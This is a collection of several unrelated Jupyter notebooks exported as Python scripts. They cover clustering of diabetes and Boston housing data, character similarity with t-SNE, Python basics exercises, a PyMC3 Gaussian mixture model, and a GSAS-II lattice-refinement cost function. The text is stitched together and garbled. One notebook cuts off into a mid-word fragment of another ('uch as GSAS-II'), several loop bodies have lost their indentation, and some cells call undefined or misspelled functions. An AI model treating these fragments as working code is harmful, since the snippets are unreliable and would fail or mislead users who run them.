predictions = finetuned_model.predict_generator(test_batches, steps =1 , verbose = 0)
predictions
test_batches.class_indices
# rounded _predictions = model.predict_generator_classes(test_batches, steps =1 , verbose = 0)
from sklearn.metrics import confusion_matrix  # was never imported above
# FIX: `test_lables` was a typo for `test_labels` (NameError at runtime)
cm = confusion_matrix(test_labels, np.round(predictions[:,0]))
cm_plot_labels = ['Au', 'Sp']
# NOTE(review): `plot_confusion_matix` is not defined anywhere in this notebook,
# and `test_batches` is only created in a commented-out cell above -- confirm
# both exist before running this cell.
plot_confusion_matix(cm, cm_plot_labels, title = 'confusion Matrix')
| 5,319 |
/diabets__classifier.ipynb
|
70e51179c86dbe9b5532b4544912e1afab0b441c
|
[] |
no_license
|
muhammadanas25/diabetes_classifier-using-kmeans
|
https://github.com/muhammadanas25/diabetes_classifier-using-kmeans
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 149,873 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="YhHB_V-7tS5x" outputId="b67abe1b-f131-46d8-e01b-b1000743ab43"
from sklearn import datasets
import pandas as pd
import numpy as np
train = pd.read_csv("diabetes__.csv")
train.head()
# + colab={"base_uri": "https://localhost:8080/", "height": 297} id="R4y-QDCBtU80" outputId="1d1251ed-a3fe-4dab-bf6f-6d8d9c83d3ec"
train.describe()
# + colab={"base_uri": "https://localhost:8080/"} id="4OB6w5WBwInD" outputId="b4c307de-c3e3-4c69-a01f-0bdb1e3aed11"
train.isnull().sum()
# + id="siuJgB8N3W33"
columns_replace= ['BloodPressure', 'Glucose', 'SkinThickness', 'Insulin', 'BMI']
# + colab={"base_uri": "https://localhost:8080/"} id="LXiUNMSy3ZVX" outputId="bcadc788-d3c2-43f1-e95d-992ba03c3ce9"
# Zero is physiologically impossible for these measurements, so treat it as missing.
# FIX: np.NaN was removed in NumPy 2.0; the canonical spelling is np.nan.
for column in columns_replace:
    train[column] = train[column].replace(0, np.nan)
print(train.isnull().sum())
# + colab={"base_uri": "https://localhost:8080/"} id="R5lTw2XI3ozH" outputId="2a261452-e56d-4458-e879-8d6725bb7181"
# Impute each missing value with its column mean (computed ignoring NaNs,
# truncated to int as in the original). np.nan replaces the removed np.NaN alias.
for column in columns_replace:
    mean = int(train[column].mean(skipna=True))
    train[column] = train[column].replace(np.nan, mean)
print(train.isnull().sum())
# + colab={"base_uri": "https://localhost:8080/", "height": 262} id="5oqPXt8hw5qD" outputId="de86d659-3a89-4483-ad55-477e1587ea8a"
train.Outcome.value_counts().plot(kind = 'bar', color = ['lightblue', 'lightgreen']); #noting imbalance in data target
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} id="xvcmJSr3xBqa" outputId="b2fc4d32-a423-4dfc-a3af-b70a40969717"
import matplotlib.pyplot as plt #correlation plot to find
import seaborn as sns
correlation_matrix = train.corr()
plt.figure(figsize=(25, 20))
sns.heatmap(correlation_matrix,
annot=True,
linewidths=0.5,
fmt= ".2f",
cmap="YlGnBu");
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="3JQlVgHB13fY" outputId="c3f3a4de-9868-419a-fc5a-35e36f2cc15e"
from sklearn.model_selection import train_test_split # Import train_test_split
# Split dataset into training set and test set
x = train.drop(['Outcome'], axis=1)  # features
# BUG FIX: y previously took the first 8 columns (train.iloc[:, :8]), which are
# the features again -- the target for this dataset is the Outcome column.
y = train['Outcome']
X_train, X_test, y_train, y_test = train_test_split(x, y, random_state=2, test_size=0.2) # 80% training and 20% test
X_train.head()
# + colab={"base_uri": "https://localhost:8080/", "height": 197} id="FaLLfaUS1kXM" outputId="7d94be6d-7c6f-47ca-e746-2fe5721eed76"
from sklearn.preprocessing import MinMaxScaler #normalising so knn donot effected by features having larger values
# fit scaler on training data
norm = MinMaxScaler().fit(X_train)
# transform training data
X_train_norm = norm.transform(X_train)
# transform testing dataabs
X_test_norm = norm.transform(X_test)
# + colab={"base_uri": "https://localhost:8080/", "height": 404} id="oa8R1FbJ8YWp" outputId="434fedf0-13cf-4a6d-b08e-aa1e9484d90b"
from sklearn.cluster import KMeans
wcss = []
for i in range(1, 11):
kmeans = KMeans(n_clusters = i, init = 'k-means++', random_state = 42)
kmeans.fit(X_test)
# inertia method returns wcss for that model
wcss.append(kmeans.inertia_)
plt.figure(figsize=(10,5))
sns.lineplot(range(1, 11), wcss,marker='o',color='red')
plt.title('The Elbow Method')
plt.xlabel('Number of clusters')
plt.ylabel('WCSS')
plt.show()
# + colab={"base_uri": "https://localhost:8080/", "height": 404} id="FBJT_nn98pNj" outputId="4a989739-967b-4445-8841-a9955067379a"
from sklearn.cluster import KMeans
wcss = []
for i in range(1, 11):
kmeans = KMeans(n_clusters = i, init = 'k-means++', random_state = 42)
kmeans.fit(X_test_norm)
# inertia method returns wcss for that model
wcss.append(kmeans.inertia_)
plt.figure(figsize=(10,5))
sns.lineplot(range(1, 11), wcss,marker='o',color='red')
plt.title('The Elbow Method')
plt.xlabel('Number of clusters')
plt.ylabel('WCSS')
plt.show()
# + id="qtjoPH619lAm"
kmeans = KMeans(n_clusters = 3, init = 'k-means++', random_state = 42)
y_kmeans = kmeans.fit_predict(X_train_norm)
# + colab={"base_uri": "https://localhost:8080/"} id="dsn1bgj--Eem" outputId="ed41cb3c-b11f-4aa4-cd3d-153d2c7ff244"
print(y_kmeans)
#We convert our prediction to dataframe so we can easily see this prediction in table form
df_pred = pd.DataFrame(y_kmeans)
print(df_pred.value_counts())
| 4,579 |
/Similar Character.ipynb
|
b8fc2f1c3fa5e6f3eeabddb025305aeccf3119cc
|
[] |
no_license
|
MGMSA6/similarity-prediction
|
https://github.com/MGMSA6/similarity-prediction
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 3,779,300 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
import pandas as pd
import numpy as np
df = pd.read_json('script-bag-of-words.json')
df.head()
df.tail()
# +
# getting character, words and num of words said by character
dialouge = {}
for index, row in df.iterrows():
    for item in row['text']:
        if item['name'] in dialouge:
            # append -- FIX: keep a trailing space on every append so the last
            # word of one line does not fuse with the first word of the next
            # (fused words skew the num_words counts computed later)
            dialouge[item['name']] = dialouge[item['name']] + item['text'] + " "
        else:
            # create character
            dialouge[item['name']] = item['text'] + " "
# -
len(dialouge)
new_df = pd.DataFrame()
new_df['character'] = dialouge.keys()
new_df['words'] = dialouge.values()
new_df
new_df.iloc[:,0:3].head()
new_df['num_words'] = new_df['words'].apply(lambda x:len(x.split()))
new_df = new_df.sort_values('num_words',ascending=False)
new_df = new_df.head(100)
new_df.shape
new_df.head()
from sklearn.feature_extraction.text import CountVectorizer
cv = CountVectorizer(stop_words='english')
embeddings = cv.fit_transform(new_df['words'])
embeddings.shape
embeddings = embeddings.astype('float64')
from sklearn.manifold import TSNE
tsne = TSNE(n_components=2, verbose=1, random_state=123)
z = tsne.fit_transform(embeddings)
z.shape
new_df['x'] = z.T[0]
new_df['y'] = z.T[1]
new_df
# !pip install plotly
import plotly.express as px
fig = px.scatter(new_df.head(25), x='x', y='y', color='character')
fig.show()
| 1,652 |
/chap1_6_2-checkpoint.ipynb
|
e717a3a89317a212df9d4158d5542b7c71e8c53d
|
[] |
no_license
|
Kimdonghyun0516/compvision
|
https://github.com/Kimdonghyun0516/compvision
| 1 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 3,742 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# The general recipe for calling functions and saving the result to a variable is thus:
#
# output = function_name(input)
# +
# Create variables var1 and var2
var1 = [1, 2, 3, 4]
var2 = True
# Print out type of var1
print(type(var1))
# Print out length of var1
print(len(var1))
# Convert var2 to an integer: out2
out2 = int(var2)
# -
# help() is useful.
# You'll see that sorted() takes three arguments: iterable, key and reverse.
# +
# Create lists first and second
first = [11.25, 18.0, 20.0]
second = [10.75, 9.50]
# Paste together first and second: full
full = first + second
# Sort full in descending order: full_sorted
full_sorted = sorted(full, reverse=True)
# Print out full_sorted
print(full_sorted)
# -
# Strings come with a bunch of methods.
# +
# string to experiment with: place
place = "poolhouse"
# Use upper() on place: place_up
place_up = place.upper()
# Print out place and place_up
print(place)
print(place_up)
# Print out the number of o's in place
print(place.count("o"))
# -
# Strings are not the only Python types that have methods associated with them. Lists, floats, integers and booleans are also types that come packaged with a bunch of useful methods.
# +
# Create list areas
areas = [11.25, 18.0, 20.0, 10.75, 9.50]
# Print out the index of the element 20.0
print(areas.index(20.0))
# Print out how often 9.50 appears in areas
print(areas.count(9.50))
# -
# Most list methods will change the list they're called on.
# +
# Create list areas
areas = [11.25, 18.0, 20.0, 10.75, 9.50]
# Use append twice to add poolhouse and garage size
areas.append(24.5)
areas.append(15.45)
# Print out areas
print(areas)
# Reverse the orders of the elements in areas
areas.reverse()
# Print out areas
print(areas)
# +
# Definition of radius
r = 0.43
# Import the math package
import math
# Calculate C
C = 2 * math.pi * r
# Calculate A
A = math.pi * r**2
# Build printout
print("Circumference: " + str(C))
print("Area: " + str(A))
# -
# General imports, like import math, make all functionality from the math package available to you. However, if you decide to only use a specific part of a package, you can always make your import more selective
# +
# Definition of radius
r = 192500
# Import radians function of math package
from math import radians
# Travel distance of Moon over 12 degrees. Store in dist.
dist = r * radians(12)
# Print out dist
print(dist)
# -
# There are several ways to import packages and modules into Python. Depending on the import call, you'll have to use different Python code.
from scipy.linalg import inv as my_inv
my_inv([[1,2], [3,4]])
| 2,888 |
/ДЗ лекции/Task_5/Lab_5_v_13.ipynb
|
54ffd6c3b34f8f312b52f17f38f29a169245028a
|
[] |
no_license
|
VeronikaSotskova/data_analysys_3course
|
https://github.com/VeronikaSotskova/data_analysys_3course
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 294,736 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="dBeXfhUVfjrg"
# ## Кластерный анализ
#
# Необходимо провести кластерный анализ предложенного набора данных при помощи:
#
# -иерархической кластеризации;
# - метода k средних;
# - методов, реализованных вами и сокурсниками.
#
# Этапы работы
# - Выполнить кластерный анализ.
# - Отобрать необходимые переменные.
# - Выполнить стандартизацию (если это нужно).
#
# - Визуализировать результаты при помощи дендрограммы и многомерного шкалирования
# - Определить число кластеров.
# - Построить график "каменистая осыпь" ("локоть").
# - Обосновать свой выбор, проверив другие варианты.
# - Рассчитать критерии качества
#
# - Интерпретировать результаты кластерного анализа: что представляют собой полученные кластеры? чем объекты в каждом из получившихся кластеров похожи друг на друга? чем объекты из разных кластеров отличаются друг от друга?
# Сравнить результаты , полученные различными методами.
# - Сделать выводы
#
#
# - (пока не нужно)Разделить выборку на части. На тестовой выборке получить кластеризацию и добавить таргет-переменную, полученную в результате кластерного анализа. Запустить модель обучения, классифицирующая объекты и проверить предсказания на тестовой выборке.
#
# + id="ASg_0_A_fj7d" executionInfo={"status": "ok", "timestamp": 1608235680118, "user_tz": -180, "elapsed": 701, "user": {"displayName": "Veronika Sotskova", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhLNN43JKAW1NCIumyulALF7c7-9n3XWD50sXnK=s64", "userId": "13222701999781590371"}}
import pandas as pd
from sklearn.preprocessing import MinMaxScaler
from sklearn.cluster import KMeans
import matplotlib.pyplot as plt
import numpy as np
import seaborn as sns
from sklearn.metrics import silhouette_score
from sklearn.metrics import davies_bouldin_score
# + colab={"base_uri": "https://localhost:8080/", "height": 195} id="8YYMPuYJgEn5" executionInfo={"status": "ok", "timestamp": 1607710698164, "user_tz": -180, "elapsed": 621, "user": {"displayName": "Veronika Sotskova", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhLNN43JKAW1NCIumyulALF7c7-9n3XWD50sXnK=s64", "userId": "13222701999781590371"}} outputId="78ca16ba-ad63-487b-ec80-1f27cd35655f"
data = pd.read_csv('housing.csv',sep=';', header=None, names=['CRIM', 'ZN', 'INDUS', 'CHAS', 'NOX', 'RM', 'AGE', 'DIS', 'RAD', 'TAX', 'PTRATIO', 'B', 'LSTAT', 'MEDV'])
data.head()
# + colab={"base_uri": "https://localhost:8080/", "height": 304} id="iZs950Qk0h4r" executionInfo={"status": "ok", "timestamp": 1607710699142, "user_tz": -180, "elapsed": 914, "user": {"displayName": "Veronika Sotskova", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhLNN43JKAW1NCIumyulALF7c7-9n3XWD50sXnK=s64", "userId": "13222701999781590371"}} outputId="6f379402-3056-4e2f-ff60-d63f8be5f6d2"
data.describe()
# + id="O__NNDnOknrM"
y = data['MEDV']
X = data[['ZN', 'RM', 'LSTAT']]
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} id="Ee8YOJSzrFrv" executionInfo={"status": "ok", "timestamp": 1607710700071, "user_tz": -180, "elapsed": 1311, "user": {"displayName": "Veronika Sotskova", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhLNN43JKAW1NCIumyulALF7c7-9n3XWD50sXnK=s64", "userId": "13222701999781590371"}} outputId="7dce7d56-eed2-4e17-d162-e210e3fa06b5"
corr = X.corr()
# ZN RM DIS? TAX? LSTAT
plt.figure(figsize=(20,20))
sns.heatmap(corr, cbar=True, square= True, fmt='.1f', annot=True, annot_kws={'size':15}, cmap='Greens')
# + id="JMRO9FgOrICP"
from sklearn.preprocessing import StandardScaler
std_scaler = StandardScaler()
scaled_df = pd.DataFrame(std_scaler.fit_transform(data), columns=data.columns)
# + id="qba0o23yym7_"
from sklearn.cluster import KMeans
Sum_of_squared_distances = []
K = range(1,11)
for k in K:
km = KMeans(n_clusters=k)
km = km.fit(data)
Sum_of_squared_distances.append(km.inertia_)
# + colab={"base_uri": "https://localhost:8080/", "height": 384} id="VVCg0Qtlyn_x" executionInfo={"status": "ok", "timestamp": 1607713487208, "user_tz": -180, "elapsed": 798, "user": {"displayName": "Veronika Sotskova", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhLNN43JKAW1NCIumyulALF7c7-9n3XWD50sXnK=s64", "userId": "13222701999781590371"}} outputId="035d090c-16c4-4a5a-d8ae-5359f639ef73"
plt.plot(K, Sum_of_squared_distances, 'bx-')
plt.xlabel('k')
plt.ylabel('Sum_of_squared_distances')
plt.title('Метод локтя для оптимального k')
plt.show()
# + colab={"base_uri": "https://localhost:8080/", "height": 395} id="BrfImsdN0RSz" executionInfo={"status": "ok", "timestamp": 1607713525257, "user_tz": -180, "elapsed": 975, "user": {"displayName": "Veronika Sotskova", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhLNN43JKAW1NCIumyulALF7c7-9n3XWD50sXnK=s64", "userId": "13222701999781590371"}} outputId="e365e4c1-cc47-4daa-9ff4-511be3b669d2"
from sklearn.cluster import KMeans
kmeans = KMeans(n_clusters=3,algorithm='elkan')
km_pred = kmeans.fit_predict(X)
plt.scatter(data['RM'], data['LSTAT'], c = kmeans.labels_)
plt.title('Data')
plt.figure(figsize=(10,6))
plt.show()
# + colab={"base_uri": "https://localhost:8080/"} id="XMKLk-zNLT8E" executionInfo={"status": "ok", "timestamp": 1607713527026, "user_tz": -180, "elapsed": 729, "user": {"displayName": "Veronika Sotskova", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhLNN43JKAW1NCIumyulALF7c7-9n3XWD50sXnK=s64", "userId": "13222701999781590371"}} outputId="53a8959c-e104-4ede-ba16-63ca4c3b32a8"
print("K-Means")
km_silhouette = silhouette_score(X,km_pred)
print("Silhouette score ", km_silhouette)
km_db = davies_bouldin_score(X,km_pred)
print("Davies Bouldin score ", km_db)
# + colab={"base_uri": "https://localhost:8080/"} id="oVcZTdFPBUQb" executionInfo={"status": "ok", "timestamp": 1607713530397, "user_tz": -180, "elapsed": 671, "user": {"displayName": "Veronika Sotskova", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhLNN43JKAW1NCIumyulALF7c7-9n3XWD50sXnK=s64", "userId": "13222701999781590371"}} outputId="c4c0cd05-b662-4c70-8580-de760487df24"
X['Cluster'] = km_pred
data['Cluster'] = X['Cluster']
# + colab={"base_uri": "https://localhost:8080/", "height": 388} id="85kRS9lG36Sh" executionInfo={"status": "ok", "timestamp": 1607713540642, "user_tz": -180, "elapsed": 1003, "user": {"displayName": "Veronika Sotskova", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhLNN43JKAW1NCIumyulALF7c7-9n3XWD50sXnK=s64", "userId": "13222701999781590371"}} outputId="116c1ed0-27a1-4ff8-ca64-3d4bc1fbe302"
from scipy.cluster.hierarchy import linkage, dendrogram
dataStdHC = linkage(scaled_df.sample(40), method = 'ward', metric = 'euclidean')
dn = dendrogram(dataStdHC, leaf_font_size = 12, color_threshold = 5.5)
plt.title('Дендрограмма по иерархической кластеризации со стандартизованными данными')
plt.rcParams["figure.figsize"] = (20,6)
plt.show()
# + colab={"base_uri": "https://localhost:8080/", "height": 186} id="hBu1Erq3CaCm" executionInfo={"status": "ok", "timestamp": 1607713544708, "user_tz": -180, "elapsed": 763, "user": {"displayName": "Veronika Sotskova", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhLNN43JKAW1NCIumyulALF7c7-9n3XWD50sXnK=s64", "userId": "13222701999781590371"}} outputId="bdeb86cb-fb9e-4621-c72a-db36faaaf6d1"
data.groupby('Cluster').mean()
# + colab={"base_uri": "https://localhost:8080/", "height": 166} id="bX0-kx_M87Fj" executionInfo={"status": "ok", "timestamp": 1607713545742, "user_tz": -180, "elapsed": 722, "user": {"displayName": "Veronika Sotskova", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhLNN43JKAW1NCIumyulALF7c7-9n3XWD50sXnK=s64", "userId": "13222701999781590371"}} outputId="63a199b9-172a-4341-abdc-e6ae73955a5b"
data.groupby('Cluster').mean()[['ZN', 'RM', 'LSTAT']]
# + colab={"base_uri": "https://localhost:8080/"} id="hoeQ_22dCC2-" executionInfo={"status": "ok", "timestamp": 1607713546848, "user_tz": -180, "elapsed": 1063, "user": {"displayName": "Veronika Sotskova", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhLNN43JKAW1NCIumyulALF7c7-9n3XWD50sXnK=s64", "userId": "13222701999781590371"}} outputId="dc22092e-03d2-42c3-862e-f1b5637d5a13"
data.groupby('Cluster').count()['MEDV']
# + colab={"base_uri": "https://localhost:8080/", "height": 395} id="ebrHiSQsFWG0" executionInfo={"status": "ok", "timestamp": 1607713607350, "user_tz": -180, "elapsed": 876, "user": {"displayName": "Veronika Sotskova", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhLNN43JKAW1NCIumyulALF7c7-9n3XWD50sXnK=s64", "userId": "13222701999781590371"}} outputId="b8dabdc0-13c3-45bb-9bc3-aa536f404dcf"
from sklearn.cluster import AgglomerativeClustering
aggl = AgglomerativeClustering(n_clusters=3)
data['Aggl_predict'] = aggl.fit_predict(data)
plt.scatter(data['RM'], data['LSTAT'], c = aggl.labels_)
plt.title('AgglomerativeClustering prediction')
plt.figure(figsize=(8,6))
plt.show()
# + colab={"base_uri": "https://localhost:8080/"} id="I9TWW3wcMheH" executionInfo={"status": "ok", "timestamp": 1607713609334, "user_tz": -180, "elapsed": 644, "user": {"displayName": "Veronika Sotskova", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhLNN43JKAW1NCIumyulALF7c7-9n3XWD50sXnK=s64", "userId": "13222701999781590371"}} outputId="d952ad0a-326e-48d6-d121-683dda359635"
print("AgglomerativeClustering")
km_silhouette = silhouette_score(data,data['Aggl_predict'])
print("Silhouette score ", km_silhouette)
km_db = davies_bouldin_score(data,data['Aggl_predict'])
print("Davies Bouldin score ", km_db)
# + colab={"base_uri": "https://localhost:8080/", "height": 186} id="M9VBvhrpHEHF" executionInfo={"status": "ok", "timestamp": 1607713615120, "user_tz": -180, "elapsed": 893, "user": {"displayName": "Veronika Sotskova", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhLNN43JKAW1NCIumyulALF7c7-9n3XWD50sXnK=s64", "userId": "13222701999781590371"}} outputId="0cb84259-cc49-44c7-c220-ce7f932bead8"
data.groupby('Aggl_predict').mean()
# + colab={"base_uri": "https://localhost:8080/", "height": 166} id="KMuM8XRXJAzp" executionInfo={"status": "ok", "timestamp": 1607713619043, "user_tz": -180, "elapsed": 652, "user": {"displayName": "Veronika Sotskova", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhLNN43JKAW1NCIumyulALF7c7-9n3XWD50sXnK=s64", "userId": "13222701999781590371"}} outputId="cf8c0415-2e4e-4983-d8a1-f8cdc1428ba9"
data.groupby('Aggl_predict').mean()[['ZN', 'RM', 'LSTAT']]
# + colab={"base_uri": "https://localhost:8080/"} id="SJgVdcdjJFtf" executionInfo={"status": "ok", "timestamp": 1607713620036, "user_tz": -180, "elapsed": 551, "user": {"displayName": "Veronika Sotskova", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhLNN43JKAW1NCIumyulALF7c7-9n3XWD50sXnK=s64", "userId": "13222701999781590371"}} outputId="e6e0cc26-5419-458a-d568-a0f65d501b3a"
data.groupby('Aggl_predict').count()['MEDV']
| 11,027 |
/pymc3/examples/gaussian_mixture_model.ipynb
|
0bec96004111c3406b29296dcb5b9e2468f99c10
|
[
"Apache-2.0",
"AFL-2.1"
] |
permissive
|
ds7788/hello-world
|
https://github.com/ds7788/hello-world
| 1 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 273,026 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# !date
import numpy as np, pandas as pd, matplotlib.pyplot as plt, seaborn as sns
# %matplotlib inline
sns.set_context('paper')
sns.set_style('darkgrid')
# # Mixture Model in PyMC3
#
# Original NB by Abe Flaxman, modified by Thomas Wiecki
#
import pymc3 as pm, theano.tensor as tt
# +
# simulate data from a known mixture distribution
np.random.seed(12345) # set random seed for reproducibility
k = 3
ndata = 500
spread = 5
centers = np.array([-spread, 0, spread])
# simulate data from mixture distribution
v = np.random.randint(0, k, ndata)
data = centers[v] + np.random.randn(ndata)
plt.hist(data);
# -
# setup model
model = pm.Model()
with model:
# cluster sizes
a = pm.constant(np.array([1., 1., 1.]))
p = pm.Dirichlet('p', a=a, shape=k)
# ensure all clusters have some points
p_min_potential = pm.Potential('p_min_potential', tt.switch(tt.min(p) < .1, -np.inf, 0))
# cluster centers
means = pm.Normal('means', mu=[0, 0, 0], sd=15, shape=k)
# break symmetry
order_means_potential = pm.Potential('order_means_potential',
tt.switch(means[1]-means[0] < 0, -np.inf, 0)
+ tt.switch(means[2]-means[1] < 0, -np.inf, 0))
# measurement error
sd = pm.Uniform('sd', lower=0, upper=20)
# latent cluster of each observation
category = pm.Categorical('category',
p=p,
shape=ndata)
# likelihood for each observed value
points = pm.Normal('obs',
mu=means[category],
sd=sd,
observed=data)
# fit model
with model:
step1 = pm.Metropolis(vars=[p, sd, means])
step2 = pm.ElemwiseCategoricalStep(vars=[category], values=[0, 1, 2])
tr = pm.sample(10000, step=[step1, step2])
# ## Full trace
pm.plots.traceplot(tr, ['p', 'sd', 'means']);
# ## After convergence
# take a look at traceplot for some model parameters
# (with some burn-in and thinning)
pm.plots.traceplot(tr[5000::5], ['p', 'sd', 'means']);
# I prefer autocorrelation plots for serious confirmation of MCMC convergence
pm.autocorrplot(tr[5000::5], varnames=['sd'])
# ## Sampling of cluster for individual data point
i=0
plt.plot(tr['category'][5000::5, i], drawstyle='steps-mid')
plt.axis(ymin=-.1, ymax=2.1)
def cluster_posterior(i=0):
    """Show the sampled cluster assignment for observation *i*.

    Prints the true (simulated) cluster and the observed value, then
    histograms the post-burn-in, thinned trace of the latent ``category``
    variable for that observation (assumes module-level ``v``, ``data``,
    ``tr`` and ``plt`` are in scope).
    """
    true_label = v[i]
    observed = np.round(data[i], 2)
    print('true cluster:', true_label)
    print(' data value:', observed)
    # burn-in of 5000 samples, thinned by 5, matching the traceplots above
    samples = tr['category'][5000::5, i]
    plt.hist(samples, bins=[-.5, .5, 1.5, 2.5, ], rwidth=.9)
    plt.axis(xmin=-.5, xmax=2.5)
    plt.xticks([0, 1, 2])
cluster_posterior(i)
| 2,890 |
/Analysis/9 nov 12/Untitled.ipynb
|
47aa5b2a70344468f1530c73c8f47dcc8753ff58
|
[] |
no_license
|
aBITnav/Scheduling
|
https://github.com/aBITnav/Scheduling
| 4 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 478,351 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# 
# 
# +
import functools
print(functools.reduce(lambda x, y: x * y, map(lambda x: x**5, map(int, input().split()))))
uch as GSAS-II.
#
# In this additional notebook we will find the starting lattice parameters using GSAS-II.
#
# **Note, this example uses the lead sulphate data data found here: https://github.com/lanl/spotlight/tree/master/examples/lead_sulphate**
#
# **If running the notebook, you need to copy the data files to the directory you run the notebook.**
#
# **Note, this notebook was tested using GSAS-II revision r5609.**
# # Define cost function
#
# We define the following cost function that sets up the lead sulphate example from the GSAS-II tutorial.
# +
import GSASIIscriptable as gsasii
import GSASIIlattice as lattice
import io
import multiprocess
import os
import shutil
import sys
import time
from mystic import models
from spotlight import filesystem
class CostFunction(models.AbstractFunction):
    """Mystic cost function wrapping a two-step GSAS-II Rietveld refinement.

    Each call to :meth:`function` runs a fresh GSAS-II project in a
    per-worker directory, refines the background, rescales the lattice
    parameters to the candidate point ``p`` and refines the unit cell,
    returning the weighted profile R-factor (Rwp) as the value to minimize.
    """
    def __init__(self, *args, **kwargs):
        """Set up detector/phase file lists; extra args go to the base class."""
        super().__init__(*args, **kwargs)
        # if True then create the subdir and copy data files there
        self.initialized = False
        # if True then print GSAS-II output
        self.debug = False
        # define a list of detectors
        # NOTE(review): paths are relative to the process working directory —
        # the data files must be copied next to the notebook (see intro text)
        self.detectors = [dict(data_file="./PBSO4.xra",
                               detector_file="./INST_XRY.prm",
                               min_two_theta=16.0,
                               max_two_theta=158.4),
                          dict(data_file="./PBSO4.cwn",
                               detector_file="./inst_d1a.prm",
                               min_two_theta=19.0,
                               max_two_theta=153.0)]
        # define a list of phases
        self.phases = [dict(phase_file="./PbSO4-Wyckoff.cif",
                            phase_label="PBSO4")]
    def function(self, p):
        """Evaluate Rwp for candidate lattice parameters ``p`` = (a, b, c).

        Side effects: creates/overwrites ``opt_<worker>/`` with GSAS-II
        project files and (unless ``self.debug``) temporarily redirects
        stdout/stderr to silence GSAS-II output.
        """
        # get start time of this step for stdout
        t0 = time.time()
        # create run dir (one per multiprocess worker so parallel
        # evaluations do not clobber each other's project files)
        dir_name = f"opt_{multiprocess.current_process().name}"
        if not self.initialized:
            filesystem.mkdir(dir_name)
            for detector in self.detectors:
                filesystem.cp([detector["data_file"], detector["detector_file"]], dest=dir_name)
            for phase in self.phases:
                filesystem.cp([phase["phase_file"]], dest=dir_name)
            self.initialized = True
        # create a text trap and redirect stdout
        # this is just to make the stdout easier to follow
        if not self.debug:
            silent_stdout = io.StringIO()
            sys.stdout = sys.stderr = silent_stdout
        # create a GSAS-II project
        gpx = gsasii.G2Project(newgpx=f"{dir_name}/lead_sulphate.gpx")
        # add histograms
        for det in self.detectors:
            gpx.add_powder_histogram(det["data_file"], det["detector_file"])
        # add phases
        for phase in self.phases:
            gpx.add_phase(phase["phase_file"], phase["phase_label"],
                          histograms=gpx.histograms())
        # turn on background refinement
        args = {
            "Background": {
                "no. coeffs" : 3,
                "refine": True,
            }
        }
        for hist in gpx.histograms():
            hist.set_refinements(args)
        # refine (step 1: background only)
        gpx.do_refinements([{}])
        gpx.save(f"{dir_name}/step_1.gpx")
        # create a GSAS-II project (step 2 starts from the step-1 result)
        gpx = gsasii.G2Project(f"{dir_name}/step_1.gpx")
        gpx.save(f"{dir_name}/step_2.gpx")
        # change lattice parameters: rescale the current cell so that
        # a, b, c become the candidate values in p (diagonal transform)
        for phase in gpx["Phases"].keys():
            # ignore data key
            if phase == "data":
                continue
            # handle PBSO4 phase
            elif phase == "PBSO4":
                cell = gpx["Phases"][phase]["General"]["Cell"]
                a, b, c = p
                t11, t22, t33 = cell[1] / a, cell[2] / b, cell[3] / c
                gpx["Phases"][phase]["General"]["Cell"][1:] = lattice.TransformCell(
                    cell[1:7], [[t11, 0.0, 0.0],
                                [0.0, t22, 0.0],
                                [0.0, 0.0, t33]])
            # otherwise raise error because refinement plan does not support this phase
            else:
                raise NotImplementedError("Refinement plan cannot handle phase {}".format(phase))
        # turn on unit cell refinement
        args = {
            "set": {
                "Cell" : True,
            }
        }
        # refine (step 2: unit cell)
        gpx.set_refinement(args)
        gpx.do_refinements([{}])
        # now restore stdout and stderr
        if not self.debug:
            sys.stdout = sys.__stdout__
            sys.stderr = sys.__stderr__
        # get minimization statistic
        stat = gpx["Covariance"]["data"]["Rvals"]["Rwp"]
        # print a message to follow the results
        print(f"Our R-factor is {stat} and it took {time.time() - t0}s to compute")
        return stat
# -
# ## An ensemble using only the cost function
#
